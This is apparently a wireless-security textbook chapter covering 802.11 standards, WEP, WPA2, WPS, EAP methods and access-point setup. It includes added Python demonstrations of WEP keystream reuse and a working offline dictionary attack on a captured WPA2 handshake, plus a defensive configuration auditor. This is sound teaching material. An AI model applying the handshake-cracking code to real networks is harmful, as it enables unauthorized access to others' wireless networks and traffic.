802.11ac is the latest in the 5 GHz band, with functional data rates up to a theoretical 6+ Gbps using multiple antennas. The 802.11ac standard was ratified in 2014, and chipsets have been available since late 2011. Designed for multimedia streaming and other high-bandwidth operations, the individual channels are twice the width of 802.11n channels, and as many as eight antennas can be deployed in a MU-MIMO (multi-user MIMO) form.
802.11: Individual Standards (3 of 4)
Association occurs only if the client has all the correct parameters needed in the handshake, among them the service set identifier (SSID).
The SSID is a phrase-based mechanism that helps ensure that you are connecting to the correct AP.
This SSID phrase is transmitted in the access point's beacon frames.
A beacon frame is an 802.11 management frame that announces the network and its parameters.
All these protocols operate in bands that are “unlicensed” by the FCC. This means that people operating this equipment do not have to be certified by the FCC, but it also means that the devices could possibly share the band with other devices, such as cordless phones, closed-circuit TV (CCTV) wireless transceivers, and other similar equipment. This other equipment can cause interference with the 802.11 equipment, possibly causing speed degradation.
The 802.11 protocol designers expected some security concerns and attempted to build provisions into the 802.11 protocol that would ensure adequate security. The 802.11 standard includes attempts at rudimentary authentication and confidentiality controls. Authentication is handled in its most basic form by the 802.11 AP, forcing the clients to perform a handshake when attempting to “associate” to the AP.
802.11: Individual Standards (4 of 4)
Typically, access to actual Ethernet segments is protected by physical security measures.
A typical wireless installation broadcasts the network right through the physical controls that are in place.
Attacking 802.11 (1 of 4)
Wireless is a popular target for several reasons:
Access gained from wireless
Lack of default security
Wide proliferation of devices
Anonymity
Low cost of the equipment needed
Wireless is a popular target for several reasons: the access gained from wireless, the lack of default security, and the wide proliferation of devices.
However, other reasons also make it attackable. The first of these is anonymity: An attacker can probe your building for wireless access from the street. Then he can log packets to and from the AP without giving any indication that an attempted intrusion is taking place. The attacker will announce his presence only if he attempts to associate to the AP. Even then, an attempted association is recorded only by the MAC address of the wireless card associating to it, and most APs do not have alerting functionality to indicate when users associate to it. This fact gives administrators a very limited view of who is gaining access to the network, if they are even paying attention at all. It gives attackers the ability to seek out and compromise wireless networks with relative impunity.
The second reason is the low cost of the equipment needed. A single wireless access card costing less than $100 can give access to any unsecured AP within driving range. Finally, attacking a wireless network is relatively easy compared to attacking other target hosts. Windows-based tools for locating and sniffing wireless-based networks have turned anyone who can download files from the Internet and has a wireless card into a potential attacker.
Attacking 802.11 (2 of 4)
Locating wireless networks was originally termed war-driving, an adaptation of the term war-dialing.
War-dialing is the process of dialing a list of phone numbers looking for modem-connected computers.
War-drivers drive around with a wireless locater program recording the number of networks found and their locations.
War-chalking started with people using chalk on sidewalks to mark some of the wireless networks they found.
Locating wireless networks was originally termed war-driving, an adaptation of the term war-dialing. War-dialing comes from the 1983 movie WarGames; it is the process of dialing a list of phone numbers looking for modem-connected computers. War-drivers drive around with a wireless locater program recording the number of networks found and their locations. This term has evolved along with war-flying and war-walking, which mean exactly what you expect. War-chalking started with people using chalk on sidewalks to mark some of the wireless networks they found.
Attacking 802.11 (3 of 4)
The most common tools for an attacker to use are reception-based programs that listen to the beacon frames output by other wireless devices, and programs that promiscuously capture all traffic.
One of the more commonly used tools is Wireshark.
Other common tools include the Aircrack-ng suite, Kismet, NetSurveyor, Vistumbler, and NetSpot.
Attacking 802.11 (4 of 4)
Once an attacker has located a network, and assuming they cannot directly connect and start active scanning and penetration of the network, the attacker will use the best attack tool there is: a network sniffer.
Popular wireless sniffers are Wireshark and Kismet.
After the limited security functions of a wireless network are broken, the network behaves exactly like a regular Ethernet network and is subject to the exact same vulnerabilities.
WEP (1 of 2)
Wired Equivalent Privacy (WEP) uses a cipher to encrypt the data as it is transmitted through the air.
WEP encrypts the data traveling across the network with an RC4 stream cipher, attempting to ensure confidentiality.
WEP supports two key lengths, typically referred to as 64 and 128 bits (40- and 104-bit secret keys plus a 24-bit IV).
WEP (2 of 2)
Some manufacturers also offer 152-bit WEP keys.
In all cases, 24 bits of the overall key length are the initialization vector (IV), which is sent in the clear; only the remaining 40, 104, or 128 bits are secret.
Biggest weakness of WEP:
The IV problem exists regardless of key length.
The IV always remains at 24 bits, so only about 16.7 million values exist; on a busy network they are exhausted in hours and IVs repeat, which reuses RC4 keystream and lets an attacker recover plaintext, and weaknesses in how RC4 is keyed with the IV allow the secret key itself to be recovered from captured traffic.
Most APs have the ability to lock in access only to known MAC addresses, providing a limited authentication capability; since MAC addresses are sent in the clear and are trivially spoofed, this is a weak control.
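The IV weakness above, shown in working code. This is an added example, not code from the textbook: a textbook RC4 implementation, WEP-style per-packet keying (IV || secret key, with the CRC-32 ICV omitted because it does not affect keystream reuse), and two constructed frames encrypted under the same IV. It shows why a repeated IV is fatal for a stream cipher (the two ciphertexts XOR to the XOR of the plaintexts, so one known plaintext reveals the other with no key at all) and uses the birthday bound to estimate how soon a card that picks IVs at random will repeat one. The key, IV and frame contents are constructed.

```python
"""WEP keystream reuse from a repeated 24-bit IV. Added example, not textbook code:
textbook RC4, WEP-style per-packet keying (IV || secret key, CRC-32 ICV omitted), and
two constructed frames encrypted under the same IV.
"""
import math
from typing import Tuple


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings up to the shorter length."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> Tuple[bytes, bytes]:
    """WEP-style encryption. The per-packet RC4 key is IV || secret key; the IV is sent in
    the clear, so the only secret is the 40- or 104-bit key. Returns (iv, ciphertext)."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits regardless of key length")
    return iv, xor(plaintext, rc4_keystream(iv + secret_key, len(plaintext)))


def recover_with_known_plaintext(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Two ciphertexts under the same IV share the keystream K:
    c1 ^ c2 = (p1 ^ K) ^ (p2 ^ K) = p1 ^ p2, so p2 = c1 ^ c2 ^ p1. No key needed."""
    return xor(xor(c1, c2), known_p1)


def packets_until_iv_collision(iv_bits: int = 24, probability: float = 0.5) -> int:
    """Birthday bound for a card that picks IVs at random: packets sent before some IV
    repeats with the given probability. A card that counts sequentially instead wraps
    after 2**iv_bits packets, a few hours of traffic on a busy 802.11b network."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


def demo() -> bytes:
    """Constructed: a predictable ARP-like frame and a secret frame, same key, same IV."""
    secret_key = bytes.fromhex("0123456789abcdef01234567")  # constructed 104-bit key
    iv = b"\x00\x00\x2a"                                    # the IV the card reused
    p1 = b"ARP who-has 192.168.1.1 tell 192.168.1.7"        # attacker can guess this one
    p2 = b"GET /admin?user=alice&pw=hunter2 HTTP"           # victim's traffic
    _, c1 = wep_encrypt(secret_key, iv, p1)
    _, c2 = wep_encrypt(secret_key, iv, p2)
    return recover_with_known_plaintext(c1, c2, p1)


if __name__ == "__main__":
    print("recovered:", demo())
    print("packets until a random IV repeats (p=0.5):", packets_until_iv_collision())
```

With random IVs the 50% collision point is under 5,000 packets, not the 16.7 million the IV size suggests; with a sequential counter the space is simply exhausted. Either way the attacker only has to listen, which is why longer WEP keys never fixed the problem.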
Current Security Methods (1 of 7)
The Wi-Fi Alliance developed Wi-Fi Protected Access (WPA) to improve upon WEP.
The 802.11i standard is the IEEE standard for security in wireless networks.
Its Wi-Fi Alliance certification is known as Wi-Fi Protected Access 2 (WPA2).
Uses 802.1X to provide authentication (Enterprise mode) or a pre-shared key (Personal mode)
Uses the Advanced Encryption Standard (AES) as the encryption algorithm, in the Counter Mode with CBC-MAC Protocol (CCMP)
Retains the Temporal Key Integrity Protocol (TKIP) only for compatibility with legacy WPA hardware
Current Security Methods (2 of 7)
TKIP works by mixing a shared secret with the card's MAC address and a per-packet sequence counter.
A new key is generated and mixed with the IV to make per-packet keys; each packet is still encrypted with the same RC4 cipher used by traditional WEP.
CCMP is the mode in which the AES cipher is used: counter mode provides confidentiality and the CBC-MAC provides message integrity.
CCMP requires new hardware to perform the AES encryption.
802.11i with CCMP corrects the weaknesses of WEP; TKIP only patches them.
Current Security Methods (3 of 7)
WPA keeps WEP's RC4 cipher but wraps it in the Temporal Key Integrity Protocol (TKIP).
TKIP employs a per-packet key, generating a new 128-bit key for each packet, plus a sequence counter against replay and the Michael message integrity check.
TKIP was created as a stopgap security measure to replace WEP.
Did not require the replacement of legacy hardware (a firmware update was enough)
Mixes a secret root key with the IV before RC4 encryption
Vulnerable to a number of attacks similar to those on WEP
No longer considered secure; disable it wherever the hardware supports CCMP
Current Security Methods (4 of 7)
IEEE 802.11i is the standard for security in wireless networks and is also known as Wi-Fi Protected Access 2 (WPA2).
Uses 802.1X to provide authentication and uses the Advanced Encryption Standard (AES) for encryption
Uses the AES block cipher in CCMP mode
Wi-Fi Protected Setup (WPS) provides an easy method of configuring wireless networks.
WPS uses an eight-digit PIN to configure wireless devices.
It is susceptible to a brute-force attack: the AP validates the two halves of the PIN separately and the last digit is a checksum, so an attacker needs at most about 11,000 guesses (10,000 + 1,000) rather than 100 million. Disable WPS on any AP that supports WPA2.
Current Security Methods (5 of 7)
Steps in setting up WPA2:
First choose a security framework
When configuring an adapter to connect to an existing network, you need to match the choice of the network.
For security purposes, you should choose WPA2-Personal or WPA2-Enterprise.
Choose AES encryption
Choose the network security key
To set up WPA2, you need to have several parameters. The first element is to choose a security framework. When configuring an adapter to connect to an existing network, you need to match the choice of the network. When setting up your own network, you can choose whichever option you prefer. There are many selections, but for security purposes, you should choose WPA2-Personal or WPA2-Enterprise. Both of these require the choice of an encryption type, either TKIP or AES. TKIP has been deprecated, so choose AES (AES-CCMP). The last element is the choice of the network security key, the secret that is shared by all users; because every key on the network is derived from it, a short or common passphrase is the main weakness of WPA2-Personal. WPA2-Enterprise, which is designed to be used with an 802.1X authentication server that distributes different keys to each user, is typically used in business environments.
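What the network security key actually protects, as an added example rather than textbook code: it derives the WPA2-Personal pairwise master key from the passphrase and SSID the way 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 iterations, 256 bits), expands it to the pairwise transient key using the handshake's MAC addresses and nonces, computes the EAPOL-Key message integrity code, and then runs the offline dictionary attack that a captured 4-way handshake allows. The SSID, MAC addresses, nonces, EAPOL frame bytes, passphrase and word list are all constructed; the derivations are the standard ones. This is why passphrase strength, not the AES cipher, decides the security of WPA2-Personal, and why Enterprise mode, which gives each user distinct keying material, is preferred in business environments.

```python
"""WPA2-Personal key derivation and the offline attack on a captured 4-way handshake.
Added example; derivations follow IEEE 802.11i, all inputs are constructed.
"""
import hashlib
import hmac
from typing import Dict, Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """Pairwise master key for WPA2-Personal: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    The passphrase must be 8 to 63 printable ASCII characters; every user of the network shares it."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key (48 bytes for CCMP): KCK | KEK | TK. Inputs are sorted so both
    sides derive the same value from the clear-text handshake fields."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_with_zeroed_mic: bytes) -> bytes:
    """EAPOL-Key MIC for WPA2 (AKM 00-0F-AC:2): HMAC-SHA1 with the KCK, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def client_msg2(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                anonce: bytes, snonce: bytes, eapol_frame: bytes) -> Dict[str, bytes]:
    """What a legitimate client sends in message 2, and therefore what an eavesdropper
    captures: SSID (from the beacon), both MACs, both nonces, the frame, and its MIC.
    Only the passphrase never goes over the air."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid.encode(), "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol_frame, "mic": eapol_mic(kck, eapol_frame)}


def crack_handshake(capture: Dict[str, bytes], wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute PMK -> KCK -> MIC per candidate and compare.
    The AP is never contacted, so rate limiting and logging on the AP cannot see it."""
    ssid = capture["ssid"].decode()
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


def demo() -> Optional[str]:
    """Constructed handshake with a weak passphrase, then the attack against a small word list."""
    ap_mac = bytes.fromhex("00113344aabb")      # constructed BSSID
    sta_mac = bytes.fromhex("0022aa556677")     # constructed client MAC
    anonce = bytes(range(32))                   # constructed; real nonces are random
    snonce = bytes(range(32, 64))
    eapol = bytes.fromhex("0103007502010a00") + b"\x00" * 109  # stand-in for message 2, MIC zeroed
    capture = client_msg2("letmein123", "CorpGuest", ap_mac, sta_mac, anonce, snonce, eapol)
    return crack_handshake(capture, ["password", "Welcome1", "letmein123", "correct horse battery"])


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The 4096 PBKDF2 rounds slow each guess, but the attacker runs them on their own hardware against a capture that takes seconds to obtain (a deauthentication forces a client to re-handshake). Long, random passphrases, or Enterprise mode, are the defense.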
Current Security Methods (6 of 7)
Figure 12.5 WPA2 setup options in Windows
This figure shows the screens for a WPA2 setup in Windows.
Current Security Methods (7 of 7)
PSK vs. Enterprise vs. Open System
When building out a wireless network, you must decide how you are going to employ security on the network.
WPA and WPA2 offer two methods to establish a connection:
PSK (Personal) and Enterprise (802.1X)
WEP-based systems offer two options:
Open System authentication and Shared Key authentication. Shared Key authentication is the weaker of the two: its challenge/response exposes a plaintext/keystream pair to an eavesdropper, so it is no better than Open System and should be avoided.
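Turning the choices from the WPS, WPA2 setup, and PSK-vs-Enterprise slides into a check that can be run against an access-point configuration. This is an added example: the two sample configurations and the checker are mine, not from the textbook or from any AP vendor. The key names (wpa, wpa_key_mgmt, wpa_pairwise, rsn_pairwise, wpa_passphrase, wps_state, ieee8021x, auth_server_addr, ignore_broadcast_ssid) follow hostapd.conf syntax, assumed here as the format being audited, and the 20-character passphrase minimum is a policy choice, not a standard requirement.

```python
"""Audit an access-point configuration for the weak choices discussed in this
chapter (WEP/open, WPA1/TKIP, WPS, short pre-shared key, hidden SSID, Enterprise
without a RADIUS server). Added example; key names follow hostapd.conf syntax
(assumed format); the sample configs and the rules are constructed here.
"""
from typing import Dict, List

MIN_PASSPHRASE_LEN = 20  # policy choice for this example, not a standard requirement

# Constructed: a typical "it works" setup with every weak option left on.
WEAK_CONFIG = """\
interface=wlan0
ssid=CorpGuest
ignore_broadcast_ssid=1
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=password1
wps_state=2
"""

# Constructed: WPA2-Enterprise (802.1X against RADIUS), CCMP only, WPS off.
HARDENED_CONFIG = """\
interface=wlan0
ssid=CorpWiFi
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
auth_server_addr=10.0.0.5
auth_server_port=1812
auth_server_shared_secret=REPLACE-WITH-LONG-RANDOM-SECRET
wps_state=0
"""


def parse_hostapd_style(text: str) -> Dict[str, str]:
    """Parse key=value lines; blank lines and # comments are ignored."""
    cfg: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        cfg[key.strip()] = value.strip()
    return cfg


def audit(text: str) -> List[str]:
    """Return a list of findings; an empty list means no weak setting was found."""
    cfg = parse_hostapd_style(text)
    findings: List[str] = []
    wpa = int(cfg.get("wpa", "0"))  # hostapd bitfield: 1 = WPA, 2 = WPA2/RSN

    if wpa == 0 or any(k.startswith("wep_key") for k in cfg):
        findings.append("open or WEP network: WEP's 24-bit IV is broken; use wpa=2")
    if wpa & 1:
        findings.append("WPA (version 1) offered: RC4/TKIP era; set wpa=2 so only WPA2 is offered")
    ciphers = set((cfg.get("wpa_pairwise", "") + " " + cfg.get("rsn_pairwise", "")).split())
    if "TKIP" in ciphers:
        findings.append("TKIP pairwise cipher allowed: deprecated, WEP-style attacks apply; use CCMP only")
    if wpa & 2 and cfg.get("rsn_pairwise") != "CCMP":
        findings.append("WPA2 enabled without rsn_pairwise=CCMP")
    if cfg.get("wps_state", "0") != "0":
        findings.append("WPS enabled: the PIN is checked in two halves, about 11,000 guesses; set wps_state=0")
    if cfg.get("ignore_broadcast_ssid", "0") != "0":
        findings.append("hidden SSID is not a security control: clients disclose it in probe requests")

    mgmt = cfg.get("wpa_key_mgmt", "")
    if "WPA-PSK" in mgmt:
        passphrase = cfg.get("wpa_passphrase", "")
        if not 8 <= len(passphrase) <= 63:
            findings.append("wpa_passphrase must be 8 to 63 characters")
        elif len(passphrase) < MIN_PASSPHRASE_LEN:
            findings.append(
                f"wpa_passphrase shorter than {MIN_PASSPHRASE_LEN}: the PMK is derived from it, "
                "so a captured handshake allows an offline dictionary attack")
        findings.append("WPA-PSK: one secret shared by every user; prefer WPA-EAP (802.1X) in an enterprise")
    if "WPA-EAP" in mgmt:
        if cfg.get("ieee8021x") != "1":
            findings.append("WPA-EAP selected but ieee8021x=1 is not set")
        if "auth_server_addr" not in cfg or "auth_server_shared_secret" not in cfg:
            findings.append("WPA-EAP without a RADIUS server address and shared secret")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {len(audit(text))} finding(s)")
        for finding in audit(text):
            print("  -", finding)
```

The weak configuration trips six rules; the hardened one trips none. The same rules map directly onto the Windows setup dialog shown in Figure 12.5: framework WPA2, cipher AES, and a key that is either long and random or replaced by 802.1X.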
Application Protocols (1 of 10)
Wireless networks have a need for secure authentication protocols.
EAP
Extensible Authentication Protocol (EAP) is defined in RFC 2284 (obsoleted by RFC 3748).
EAP-TLS relies on Transport Layer Security (TLS), with certificates on both the client and the server.
EAP-TTLS works with the server authenticating to the client with a certificate, but the protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols.
Application Protocols (2 of 10)
LEAP
Lightweight Extensible Authentication Protocol (LEAP) is a proprietary EAP method designed by Cisco.
Its MS-CHAP-based exchange can be attacked offline, so it is being phased out in favor of newer protocols such as PEAP or EAP-TLS.
PEAP
PEAP, or Protected EAP, is an open standard.
Developed to protect the EAP communication by encapsulating it in a TLS tunnel
EAP itself was designed assuming a secure communication channel, which a wireless link is not; PEAP supplies that channel
Widely supported by vendors for use over wireless networks
Application Protocols (3 of 10)
EAP-FAST
EAP-Flexible Authentication via Secure Tunneling (EAP-FAST) is described in RFC 4851 and was proposed by Cisco to replace LEAP.
Offers a lightweight tunneling protocol to enable authentication.
Its distinguishing characteristic is the Protected Access Credential (PAC), a shared secret used to establish a TLS tunnel through which client credentials are verified; provisioning the PAC in band without a server certificate leaves that first exchange open to a man-in-the-middle, so the PAC should be provisioned securely.
Application Protocols (4 of 10)
EAP-TLS
EAP-TLS is an IETF open standard (RFC 5216) that uses the Transport Layer Security (TLS) protocol to secure the authentication process.
One of the most secure implementations, because common deployments require client-side certificates.
An attacker must possess the private key of a client's certificate to impersonate that client, and the client must validate the server's certificate so that a rogue AP cannot impersonate the network.
Application Protocols (5 of 10)
EAP-TTLS
Is an extension of EAP-TLS called Tunneled TLS
The authentication process is protected by the tunnel from man-in-the-middle attacks, provided the client validates the server's certificate
Client certificates can be used but are not required
This makes it easier to set up than EAP-TLS for clients without certificates.
Application Protocols (6 of 10)
Implementing 802.1X
The IEEE 802.1X standard (port-based network access control) can carry a wide variety of EAP authentication methods and also fits well into existing authentication systems such as RADIUS and LDAP.
This allows 802.1X to interoperate well with other systems such as VPNs and dial-up RAS.
Three common methods are used to implement 802.1X: EAP-TLS, EAP-TTLS, and EAP-MD5.
Three common methods are used to implement 802.1X: EAP-TLS, EAP-TTLS, and EAP-MD5. EAP-TLS relies on TLS, the standardized successor to SSL, to pass credentials. The standard, originally authored at Microsoft (RFC 2716, now RFC 5216), uses X.509 certificates on both the client and the server and offers dynamic, per-session key generation (originally per-session WEP keys; under 802.11i the keying material becomes the pairwise master key). This means that the organization must have the ability to support a public key infrastructure (PKI) in the form of X.509 digital certificates, and to enroll every client device. Per-user, per-session keys prevent anyone from cracking the key in use for another user: even if an attacker captured enough of one user's traffic to recover that user's key, access would be gained only to that user's traffic, no other user's data would be compromised, and the key could not be used to connect to the AP. This standard authenticates the client to the AP, but it also authenticates the AP to the client, helping to avoid man-in-the-middle attacks. The main operational cost of EAP-TLS is exactly that client-certificate requirement: it is an open standard and works with certificates from any issuer, but every client must be issued a certificate from a CA the authentication server trusts, and every client must be configured to validate the server's certificate, so a mixed environment with unmanaged devices is harder to roll out.
As discussed earlier, EAP-TTLS works much the same way as EAP-TLS, with the server authenticating to the client with a certificate, but the protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols such as Password Authentication Protocol (PAP), Challenge-Handshake Authentication Protocol (CHAP), MS-CHAP, or MS-CHAPv2. This makes the protocol more versatile while still supporting the enhanced security features such as dynamic key assignment. The legacy method is only as safe as the tunnel around it, so clients must be configured to validate the server certificate; otherwise a rogue AP presenting its own certificate can harvest the inner credentials.
EAP-MD5, while it does improve the authentication of the client to the AP, does little else to improve the security of your AP. The protocol works by hashing a server-supplied challenge together with the user's password using the MD5 hash function (MD5 is a hash, not an encryption algorithm, and a captured challenge/response pair is open to an offline dictionary attack). This protocol, unfortunately, provides no way for the AP to authenticate with the client, and it does not provide for dynamic WEP key assignment. In the wireless environment, without strong two-way authentication, it is very easy for an attacker to perform a man-in-the-middle attack. Normally, these types of attacks are difficult to perform, requiring a traffic redirect of some kind, but wireless changes all those rules. By setting up a rogue AP, an attacker can attempt to get clients to connect to it as if it were authorized and then simply authenticate to the real AP, a simple way to have access to the network and the client's credentials. The problem of not dynamically generating WEP keys is that it simply opens up the network to the same lack of confidentiality to which a normal AP is vulnerable. An attacker has to wait only for enough traffic to crack the WEP key, and he can then observe all traffic passing through the network.
Because the security of wireless LANs has been so problematic, many users have simply switched to a layered security approach—that is, they have moved their APs to untrustworthy portions of the network and have forced all clients to authenticate through the firewall to a third-party VPN system. The additional security comes at a price of putting more load on the firewall and VPN infrastructure and possibly adding cumbersome software to the users’ devices. While wireless can be set up in a very secure manner in this fashion, it can also be set up poorly. Some systems lack strong authentication of both endpoints, leading to possibilities of a man-in-the-middle attack. Also, even though the data is tunneled through, IP addresses are still sent in the clear, giving an attacker information about what and where your VPN endpoint is.
Another phenomenon of wireless is born out of its wide availability and low price. All the security measures of the wired and wireless network can be defeated by the rogue AP. This is the third possible type of rogue access point discussed in this chapter; they all share the same name as they all represent a security breach. However, since they are implemented with different motives and accordingly pose slightly different threats, we discuss them all separately. In this case, a well-intentioned employee who is trying to make the work environment more convenient purchases an AP at a local retailer and installs it. When installed, it works fine, but it typically will have no security configured. Since the IT department doesn't know about it, it is an uncontrolled entry point into the network.
No matter what kind of rogue AP we are dealing with, the rogue AP must be detected and controlled. The most common way to control rogue APs is some form of wireless scanning to ensure only legitimate wireless is in place at an organization. While complete wireless IDSs will detect APs, this can also be done with a laptop and free software.
Application Protocols (7 of 10)
EAP-TLS relies on TLS, the standardized successor to SSL, to pass credentials.
EAP-TTLS works much the same way as EAP-TLS.
The server authenticates to the client with a certificate.
The protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols.
Application Protocols (8 of 10)
RADIUS federation
Using a series of RADIUS servers in a federated arrangement has been employed in several worldwide RADIUS federation networks.
A user presents their credentials at a visited access point using a certificate-based tunneling EAP method.
The first RADIUS server uses the realm in the user's outer identity to determine which RADIUS server to forward the request to; from there the user is authenticated by their home RADIUS server and the result is passed back, permitting the user to join the visited network.
Application Protocols (9 of 10)
RADIUS federation (continued)
Because the request must pass through multiple networks that are not the user's own, the EAP methods are limited to tunneled, certificate-based ones (EAP-TLS, EAP-TTLS, PEAP) so that the inner credentials are never exposed to the intermediate RADIUS servers; the outer identity can be anonymous, with only the realm needed for routing.
This type of federated identity at global scale demonstrates the power of RADIUS and EAP methods.
Application Protocols (10 of 10)
CCMP
Stands for Counter Mode with Cipher Block Chaining-Message Authentication Code Protocol (or Counter Mode with CBC-MAC Protocol)
CCMP is a data encapsulation encryption mechanism designed for wireless use.
CCMP is the mode in which the AES cipher is used: AES in counter mode provides confidentiality, and a CBC-MAC over the frame provides message integrity, so a modified frame is rejected.
CCMP requires new hardware to perform the AES encryption, which is why early WPA devices used TKIP instead.
Wireless Systems Configuration
Wireless systems are more than just protocols.
Putting up a functional wireless system in a house is as easy as plugging in a wireless access point and connecting.
But in an enterprise, where multiple access points will be needed, the configuration takes significantly more work.
Site surveys are needed to determine proper access point and antenna placement, as well as channels and power levels.
Access Point (1 of 2)
Wi-Fi access points are the point of entry for radio-based network signals into and out of a network.
Wireless access points can operate in several different modes.
The most common mode, which all access points support, is normal (infrastructure) mode.
In this mode the access point provides a point of connection from the wireless network to the wired network.
Access Point (2 of 2)
Bridged mode allows an access point to communicate directly with another access point.
This allows the extension of a wireless LAN over a greater distance.
Repeater mode extends the range by relaying traffic between access points and clients.
A bridge-mode device connects two network segments, while a repeater merely acts to extend range.
Fat vs. Thin
Fat (or thick) access points refer to standalone access points.
Thin access points refer to controller-based access points.
These solutions differ in their handling of common functions such as configuration, encryption, updates, and policy settings.
Determining which is more effective requires a closer examination of the differences compared to a site's needs and budget.
Controller Based vs. Standalone (1 of 2)
Small standalone Wi-Fi access points can have substantial capabilities with respect to authentication, encryption, and channel management.
As the wireless deployment grows in size and complexity, there are some advantages to a controller-based access point solution.
Controller Based vs. Standalone (2 of 2)
Controller-based solutions
Allow for centralized management and control
Can facilitate better channel management for adjacent access points, better load balancing, and easier deployment of patches and firmware updates
Offer security advantages in overall network monitoring and security controls, including detection of rogue access points
Enable network access control based on user identity in large environments
SSID (1 of 2)
The 802.11 standard includes attempts at rudimentary authentication and confidentiality controls.
Authentication is handled in its most basic form by the 802.11 access point (AP), forcing clients to perform a handshake when attempting to “associate” to the AP.
SSID (2 of 2)
Service set identifier (SSID): a network name that the client must present, often mistaken for an authentication function
An identifier of up to 32 bytes carried in beacon, probe, and association management frames
Association occurs when the client has the correct parameters needed in the handshake, including the SSID.
SSID is a good idea in theory
It is sent in plaintext, so in practice the SSID offers little security significance.
SSID does not provide true authentication; hiding it from beacons does not help either, since clients reveal it in probe requests and association requests.
Wireless scanning programs work by capturing the beacon frames, and thereby the SSIDs, of all APs.
Signal Strength
Usability of a wireless signal is directly related to its signal strength.
Factors that can influence signal strength
Transmitting power level
Environment across which the signal is transmitted
In buildings with significant metal in the walls and roofs, additional power may be needed to have sufficient signal strength at the receivers.
Wi-Fi power levels can be controlled by the hardware for a variety of reasons.
Band Selection/Width
Deployment of access points should support the desired bands based on client needs.
Multi-band (dual-radio) access points exist and are commonly employed to resolve client issues.
Wi-Fi operates over two different frequency bands:
2.4 GHz for 802.11b/g and n
5 GHz for 802.11a, n, and ac
Antenna Types (1 of 2)
Omnidirectional antenna operates in all directions.
Covers the greatest area per antenna
Weakness occurs in corners and hard-to-reach areas
Yagi and panel antennas are directional in nature.
Panel antennas provide solid room performance while preventing signal bleed behind the antennas
Yagi antennas funnel the energy along a beam and allow longer communication distances using standard power
Enables eavesdroppers to capture signals from much greater distances
Wireless networking problems caused by weak signal strength can sometimes be solved by installing upgraded Wi-Fi radio antennas on the access points. On business networks, the complexity of multiple access points typically requires a comprehensive site survey to map the Wi-Fi signal strength in and around office buildings. Additional wireless access points can then be strategically placed where needed to resolve dead spots in coverage. For small businesses and homes, where a single access point may be all that is needed, an antenna upgrade may be a simpler and more cost-effective option to fix Wi-Fi signal problems.
Antenna Types (2 of 2)
Figure 12.6 Wireless access point antennas
This figure shows a sampling of common Wi-Fi antennas: (a) is a common home wireless router, (b) is a commercial indoor wireless access point, and (c) is an outdoor directional antenna. These can be visible as shown, or hidden above ceiling tiles.
Two common forms of upgraded antennas are the Yagi antenna and the panel antenna. An example of a Yagi antenna is shown in this figure (c).
Antenna Placement
The objective of antenna placement is to maximize the coverage over a physical area and reduce low-gain areas.
This can be very complex and frequently requires a site survey to determine proper placement.
MIMO (multiple-input, multiple-output) is a set of antenna technologies in which the access point and the client each use multiple antennas, so that several spatial streams can be sent over the same channel at once.
Wi-Fi is by nature a radio-based method of communication, and as such uses antennas to transmit and receive the signals. The actual design and placement of the antennas can have a significant effect on the usability of the radio frequency (RF) medium for carrying the traffic. Antennas come in a variety of types, each with its own transmission pattern and gain factor. High-gain antennas can deal with weaker signals, but also have more-limited coverage. Wide-coverage, omnidirectional antennas can cover wider areas, but at lower levels of gain.
